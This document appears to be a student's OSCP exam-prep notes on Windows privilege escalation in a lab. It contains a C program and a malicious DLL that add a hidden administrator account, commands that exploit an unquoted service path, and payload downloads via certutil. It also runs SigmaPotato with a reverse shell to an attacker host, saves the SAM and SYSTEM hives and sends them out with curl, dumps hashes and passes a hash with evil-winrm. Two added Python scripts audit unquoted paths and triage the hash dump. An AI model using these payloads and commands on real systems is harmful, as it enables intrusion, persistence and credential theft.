OSCPExamTips

SSH connection

ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" learner@192.168.50.52

The UserKnownHostsFile=/dev/null and StrictHostKeyChecking=no options have been added to prevent the known-hosts file on our local Kali machine from being corrupted.

From a security perspective, this is not best practice. The reason we use these options is to stop our known-hosts file from flagging mismatched host information when we revert lab machines. Using the UserKnownHostsFile=/dev/null option prevents the server host key from being recorded, so every connection is treated as a new one. Using the StrictHostKeyChecking=no option tells SSH not to verify the authenticity of the server host key at all.

In the real world, using either (or both) of these options would open us up to man-in-the-middle attacks. We use them here to make the student's learning experience smoother.

adduser.exe

#include <stdlib.h>

// Creates a local user and adds it to the local Administrators group.
int main ()
{
  int i;

  i = system ("net user dave2 password123! /add");
  i = system ("net localgroup administrators dave2 /add");
  (void)i; // return codes are not checked here

  return 0;
}

x86_64-w64-mingw32-gcc adduser.c -o adduser.exe

List of services with spaces and missing quotes in the binary path

Get-CimInstance -ClassName win32_service | Select Name,State,PathName

wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """

ReynhSurveillance Stopped C:\Enterprise Software\Monitoring Solution\Surveillance Apps\ReynhSurveillance.exe

16.2.3. Unquoted Service Paths

Q2:

Of the candidate paths, only Surveillance.exe works

copy adduser.exe "C:\Enterprise Software\Monitoring Solution\Surveillance.exe"
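The unquoted-path check written out as an auditor's script, added here as an example (it is not part of these notes, the PEN-200 course, or any tool the notes use). It makes explicit the test that the wmic/findstr one-liner above only approximates, lists the locations the service controller probes before the intended binary when a space-containing path is unquoted (the reasoning behind choosing Surveillance.exe for Q2), and produces the quoted PathName that fixes the service. The service list is constructed sample data: ReynhSurveillance is taken from the output above, the other service names and paths are hypothetical.

```python
"""Audit Windows service image paths for the unquoted-path weakness.

Added example, not part of the notes or the course. SAMPLE_SERVICES is
constructed data shaped like the output of
`Get-CimInstance -ClassName win32_service | Select Name,State,PathName`.
"""
import re

# Constructed sample: (Name, State, PathName). Only ReynhSurveillance comes
# from the notes; the other four services are hypothetical.
SAMPLE_SERVICES = [
    ("ReynhSurveillance", "Stopped",
     r"C:\Enterprise Software\Monitoring Solution\Surveillance Apps\ReynhSurveillance.exe"),
    ("GoodQuoted", "Running", r'"C:\Program Files\Vendor\Agent Service\agent.exe" -service'),
    ("NoSpaces", "Running", r"C:\Vendor\Agent\agent.exe /svc"),
    ("WinHostSvc", "Running", r"C:\Windows\system32\svchost.exe -k netsvcs"),
    ("ArgsOnly", "Running", r"C:\Tools\updater.exe --interval 30 min"),  # space only in the arguments
]

# Image path ends at the first ".exe"; whatever follows is the argument string.
_IMAGE_RE = re.compile(r"^(?P<image>.*?\.exe)(?:\s+(?P<args>.*))?$", re.IGNORECASE | re.DOTALL)


def split_image_and_args(pathname):
    """Split an unquoted PathName into (image path, argument string)."""
    m = _IMAGE_RE.match(pathname.strip())
    if not m:  # no ".exe" anywhere: treat the whole value as the image
        return pathname.strip(), ""
    return m.group("image"), (m.group("args") or "")


def is_unquoted_vulnerable(pathname):
    """True when the PathName has no quotes, the image lives outside the
    Windows directory and a space occurs inside the image path itself
    (a space that is only in the arguments is harmless)."""
    p = pathname.strip()
    if '"' in p:
        return False
    image, _ = split_image_and_args(p)
    if image.lower().startswith(r"c:\windows"):
        return False
    return " " in image


def probe_candidates(image):
    """Locations tried, in order, before the intended binary: cut the unquoted
    image at every space and append .exe when the fragment has no extension.
    An auditor checks the ACL of each candidate's parent directory; a writable
    one is the finding to report and fix."""
    tokens = image.split(" ")
    out = []
    for n in range(1, len(tokens) + 1):
        frag = " ".join(tokens[:n])
        if not frag.lower().endswith(".exe"):
            frag += ".exe"
        out.append(frag)
    return out


def quoted_pathname(pathname):
    """The corrected PathName: image wrapped in quotes, arguments untouched.
    Applied with `sc.exe config <Name> binPath= ...` or by editing the
    service's ImagePath value under the Services registry key."""
    image, args = split_image_and_args(pathname)
    return f'"{image}"' + (f" {args}" if args else "")


def audit(services):
    """Return {Name: {"candidates": [...], "fix": "..."}} for vulnerable services."""
    findings = {}
    for name, _state, pathname in services:
        if is_unquoted_vulnerable(pathname):
            image, _ = split_image_and_args(pathname)
            findings[name] = {"candidates": probe_candidates(image),
                              "fix": quoted_pathname(pathname)}
    return findings


if __name__ == "__main__":
    for name, finding in audit(SAMPLE_SERVICES).items():
        print(name)
        for candidate in finding["candidates"]:
            print("  probe:", candidate)
        print("  fix  :", finding["fix"])
```

Unlike the findstr filter, which lists every unquoted non-Windows service, `is_unquoted_vulnerable` ignores services whose only space sits in the argument string (the hypothetical ArgsOnly entry), so the report contains only services where a probe path actually differs from the intended binary.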

16.3.2

Q3: DLL hijacking

#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
    HANDLE hModule,            // Handle to DLL module
    DWORD ul_reason_for_call,  // Reason for calling function
    LPVOID lpReserved )        // Reserved
{
    int i; // declared before the switch: in C a declaration cannot directly follow a case label

    switch ( ul_reason_for_call )
    {
        case DLL_PROCESS_ATTACH: // A process is loading the DLL.
            i = system ("net user dave3 password123! /add");
            i = system ("net localgroup administrators dave3 /add");
            break;
        case DLL_THREAD_ATTACH: // A process is creating a new thread.
            break;
        case DLL_THREAD_DETACH: // A thread exits normally.
            break;
        case DLL_PROCESS_DETACH: // A process unloads the DLL.
            break;
    }
    (void)i; (void)hModule; (void)lpReserved; // unused; keeps the build warning-free
    return TRUE;
}

x86_64-w64-mingw32-gcc test.c --shared -o test.dll

iwr -uri http://192.168.45.241/test.dll -Outfile EnterpriseServiceOptional.dll

certutil.exe -f -urlcache http://192.168.45.241/test.dll EnterpriseServiceOptional.dll

iwr -uri http://192.168.45.241/rev.dll -Outfile EnterpriseServiceOptional.dll

certutil.exe -f -urlcache http://192.168.45.241/SigmaPotato.exe SigmaPotato.exe

certutil.exe -f -urlcache http://192.168.45.241/rev.exe rev.exe

.\SigmaPotato.exe --revshell 192.168.45.241 445

cmd /c dir /S /B SAM == SYSTEM == SAM.OLD == SYSTEM.OLD == SAM.BAK == SYSTEM.BAK

c:\Program Files\Common Files\System
c:\Program Files (x86)\Common Files\System
c:\ProgramData\USOShared\Logs\System
c:\Users\All Users\USOShared\Logs\System
c:\Windows\System
c:\Windows\assembly\NativeImages_v4.0.30319_32\System
c:\Windows\assembly\NativeImages_v4.0.30319_64\System
c:\Windows\diagnostics\system
c:\Windows\Microsoft.NET\assembly\GAC_MSIL\System
c:\Windows\PLA\System
c:\Windows\SysWOW64\LogFiles\SAM
c:\Windows\Vss\Writers\System

SeBackupPrivilege abuse

# Create a temp directory:
mkdir C:\temp

# Copy the sam and system hive of HKLM to C:\temp and then download them.
reg save hklm\sam C:\temp\sam.hive

reg save hklm\system C:\temp\system.hive

# Transfer to Kali
cmd /c curl -F "file=@sam.hive" http://192.168.45.241:8081/upload

cmd /c curl -F "file=@system.hive" http://192.168.45.241:8081/upload

# Dump hash
$ impacket-secretsdump -sam sam.hive -system system.hive LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0xb4999e49259682622dcc1e3a1636ff45
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8f518eb35353d7a83d27e7fe457664e5:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:856f13362db36284f7d964120d794a98:::
enterpriseadmin:1001:aad3b435b51404eeaad3b435b51404ee:d94267c350fc02154f2aff04d384b354:::
diana:1002:aad3b435b51404eeaad3b435b51404ee:3f2e7dddbe7a42d8978c1689b67297f3:::
alex:1003:aad3b435b51404eeaad3b435b51404ee:821036ef8b6f43194779f6fca426f3f7:::
enterpriseuser:1004:aad3b435b51404eeaad3b435b51404ee:b875ee792421982ebcfa8217340ef376:::
offsec:1005:aad3b435b51404eeaad3b435b51404ee:d2ce08a1ee362158863d47d478b2622e:::
[*] Cleaning up...
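Reading the dump as an analyst, as an added example (not from the notes and not part of Impacket): a parser for the uid:rid:lmhash:nthash lines secretsdump prints, followed by the checks that belong in a report on this output: which account is the built-in Administrator (RID 500, whatever its name), which accounts carry the well-known NT hash of the empty password, whether any legacy LM hashes are still stored, and which accounts share a hash and therefore a password. The listing is the secretsdump output above, embedded so the script runs offline.

```python
"""Triage of an impacket-secretsdump SAM listing (added example, not from the notes)."""
import re
from collections import defaultdict

# Well-known constants: the LM field holds EMPTY_LM when no LM hash is stored
# (or the password is empty); the NT field holds EMPTY_NT for an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# The secretsdump output from the notes, embedded verbatim so this runs offline.
SAMPLE_DUMP = """\
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0xb4999e49259682622dcc1e3a1636ff45
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8f518eb35353d7a83d27e7fe457664e5:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:856f13362db36284f7d964120d794a98:::
enterpriseadmin:1001:aad3b435b51404eeaad3b435b51404ee:d94267c350fc02154f2aff04d384b354:::
diana:1002:aad3b435b51404eeaad3b435b51404ee:3f2e7dddbe7a42d8978c1689b67297f3:::
alex:1003:aad3b435b51404eeaad3b435b51404ee:821036ef8b6f43194779f6fca426f3f7:::
enterpriseuser:1004:aad3b435b51404eeaad3b435b51404ee:b875ee792421982ebcfa8217340ef376:::
offsec:1005:aad3b435b51404eeaad3b435b51404ee:d2ce08a1ee362158863d47d478b2622e:::
[*] Cleaning up...
"""

# One hash line: user:rid:lmhash:nthash::: (status lines starting with [*] do not match).
HASH_LINE = re.compile(
    r"^(?P<user>[^:\s]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::\s*$")


def parse_sam_dump(text):
    """Return a list of (user, rid, lmhash, nthash) tuples, hashes lower-cased."""
    records = []
    for line in text.splitlines():
        m = HASH_LINE.match(line.strip())
        if m:
            records.append((m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()))
    return records


def builtin_administrator(records):
    """Name of the RID-500 account: the built-in Administrator even if renamed."""
    for user, rid, _lm, _nt in records:
        if rid == 500:
            return user
    return None


def empty_password_accounts(records):
    """Accounts whose NT hash is the hash of the empty string."""
    return [user for user, _rid, _lm, nt in records if nt == EMPTY_NT]


def lm_hash_present(records):
    """Accounts that still have a real LM hash stored (legacy LM hashing enabled)."""
    return [user for user, _rid, lm, _nt in records if lm != EMPTY_LM]


def shared_nt_hashes(records):
    """NT hashes used by more than one account, i.e. identical passwords."""
    by_hash = defaultdict(list)
    for user, _rid, _lm, nt in records:
        by_hash[nt].append(user)
    return {nt: users for nt, users in by_hash.items() if len(users) > 1}


if __name__ == "__main__":
    recs = parse_sam_dump(SAMPLE_DUMP)
    print("accounts parsed   :", len(recs))
    print("built-in admin    :", builtin_administrator(recs))
    print("empty passwords   :", empty_password_accounts(recs))
    print("LM hashes present :", lm_hash_present(recs))
    print("shared NT hashes  :", shared_nt_hashes(recs))
```

On this listing the empty-password check fires for Guest and DefaultAccount, which is expected as long as both accounts are disabled, so the finding is worth cross-referencing against the account status rather than reported on its own; no LM hashes are stored, and the only shared hash is that empty one.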

$ evil-winrm -i 192.168.207.222 -u "Administrator" -H "8f518eb35353d7a83d27e7fe457664e5"